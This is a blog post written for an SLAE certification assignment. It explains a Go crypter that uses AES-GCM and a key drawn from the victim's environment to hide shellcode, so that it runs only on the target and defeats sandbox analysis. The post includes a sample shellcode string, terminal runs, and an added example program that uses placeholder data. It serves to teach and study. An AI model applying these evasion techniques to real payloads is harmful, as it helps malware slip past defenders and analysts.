SLAE 7: Creating your own crypter using golang
Programming / January 27, 2020 • 4 min read
In this article, we will build a simple crypter for encrypting and decrypting shellcode. I chose to implement the crypter in Go using environmental keys.
I will not spend time implementing a fancy shellcode execution method in this article; only the encryption and decryption methods are in scope for now.
The encryption/decryption process uses AES-GCM with a key built from a specific file path in /etc/ concatenated with the currently logged-in user. This is called environmental keying, meaning you use values specific to the victim's environment such as files, hostname or users. The purpose is to make sure the malware only executes in one specific environment, which in turn means the attacker needs to know some details about that environment before encrypting any shellcode.
Analysing the shellcode will be difficult because the correct environment values are needed to decrypt it. Relying on dynamic analysis in a sandbox is futile for the same reason: the sandbox will not contain the expected values.
The specific values I have chosen for the key are the file path /etc/vmware-tools/scripts/vmware/network and the currently logged-in user. The final key will look like this:
The following example encrypts a simple shellcode that executes
dubs3c@slae:~/SLAE/EXAM/github/assignment_7$ go run main.go -e -s "\xfc\xbb\x1b\x91\xcd\xc8\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x2a\x43\x9f\xa0\x22\x4c\x53\x59\xd2\xbd\xbc\xfb\x4b\x4b\x21\xca\x42\x7a\x66\x9d\x5f\xb0\xe6\xde\x5f\x4a\xe7\xde"
[+] Your encrypted shellcode: 5af9fb00a2147e12ba73c2686b1b25fac3f441ffcb6974b00ec7413208dc749dae128faf67a5db80fe868dc2386e30546409503beb9ea6973441dc0ace3b35563550e3041fdde2c234b7dbd36ce74f1653ac08ec3be1f6fac3dd6fc34b378477bf6a5acf7800d01ee1c9280d8f6e2ccb8b13f517e790cc6d6623df9b1ced1dc1ebd8df2caca412f6f9d8233bd233fd6c590b12211f0706fc18dca864e97908df4eb638c8b223afc57d59714db119a0075dc935a65a38b4fe175fc15ad2b03125303b98c991ac01238f61c10f444bd85ad081fe2d097f816345e2ab98436cae10033c1cd870502608eac6a3149688b992
dubs3c@slae:~/SLAE/EXAM/github/assignment_7$
The decryption function will loop over all files and folders in /etc/ and try each file path as the key together with the current username. When the correct key is found, the shellcode is decrypted.
dubs3c@slae:~/SLAE/EXAM/github/assignment_7$ go run main.go -d -s "5af9fb00a2147e12ba73c2686b1b25fac3f441ffcb6974b00ec7413208dc749dae128faf67a5db80fe868dc2386e30546409503beb9ea6973441dc0ace3b35563550e3041fdde2c234b7dbd36ce74f1653ac08ec3be1f6fac3dd6fc34b378477bf6a5acf7800d01ee1c9280d8f6e2ccb8b13f517e790cc6d6623df9b1ced1dc1ebd8df2caca412f6f9d8233bd233fd6c590b12211f0706fc18dca864e97908df4eb638c8b223afc57d59714db119a0075dc935a65a38b4fe175fc15ad2b03125303b98c991ac01238f61c10f444bd85ad081fe2d097f816345e2ab98436cae10033c1cd870502608eac6a3149688b992"
[+] Decrypted shellcode: \xfc\xbb\x1b\x91\xcd\xc8\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x2a\x43\x9f\xa0\x22\x4c\x53\x59\xd2\xbd\xbc\xfb\x4b\x4b\x21\xca\x42\x7a\x66\x9d\x5f\xb0\xe6\xde\x5f\x4a\xe7\xde
dubs3c@slae:~/SLAE/EXAM/github/assignment_7$
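To make the mechanism behind the two runs above concrete, here is an added, self-contained Go example of the AES-GCM round trip keyed from environment values. It is not the author's program: the post does not say how its own code turns "file path + user name" into a key of a length AES accepts, so hashing the concatenation with SHA-256 is an assumption made here, and the sample path, user and payload bytes are constructed placeholders. The example does not walk /etc/ or execute anything; it shows the property the post relies on, namely that GCM authenticates the data, so a key derived from the wrong path or user produces an error rather than garbage. The flip side, worth noting for anyone analysing such a sample, is that the decryption routine itself discloses how the key is derived, so once the expected path and user are known the key is trivially recomputed; the scheme only resists analysis in an environment that lacks those values.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"io"
)

// deriveKey builds a 32-byte AES-256 key from the two environment values the
// post describes: a file path under /etc/ and the logged-in user name.
// Hashing the concatenation with SHA-256 is an assumption made in this example
// so the key has a length AES accepts; the post does not show its own method.
func deriveKey(filePath, user string) []byte {
	sum := sha256.Sum256([]byte(filePath + user))
	return sum[:]
}

// encrypt seals plaintext with AES-GCM under key. A fresh random nonce is
// generated per call and prepended to the ciphertext so decrypt can recover it;
// reusing a nonce under the same key would break GCM's guarantees.
func encrypt(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// decrypt splits off the nonce and opens the ciphertext. Because GCM checks an
// authentication tag, a key derived from the wrong path or user fails outright
// instead of yielding random bytes; that is what lets a candidate-key loop
// recognise the correct key.
func decrypt(key, blob []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(blob) < gcm.NonceSize() {
		return nil, errors.New("ciphertext too short to contain a nonce")
	}
	nonce, ct := blob[:gcm.NonceSize()], blob[gcm.NonceSize():]
	return gcm.Open(nil, nonce, ct, nil)
}

func main() {
	// Constructed sample values; the post itself keys on
	// /etc/vmware-tools/scripts/vmware/network plus the user name.
	payload := []byte("constructed sample bytes, not shellcode")
	key := deriveKey("/etc/constructed-example-path", "alice")

	blob, err := encrypt(key, payload)
	if err != nil {
		panic(err)
	}
	fmt.Println("[+] encrypted:", hex.EncodeToString(blob))

	pt, err := decrypt(key, blob)
	fmt.Printf("[+] expected environment: err=%v plaintext=%q\n", err, pt)

	// An analyst or sandbox without the expected user gets an authentication
	// error, not a decrypted payload.
	_, err = decrypt(deriveKey("/etc/constructed-example-path", "bob"), blob)
	fmt.Println("[-] wrong user:", err)
}
```

Run it with `go run main.go`; the first decrypt prints the payload back and the second prints a GCM authentication error. Storing the nonce in front of the ciphertext is the usual Go idiom and keeps the encrypted blob a single hex string, matching the shape of the output in the post.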
Below is the final program for encrypting/decrypting shellcode.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-1490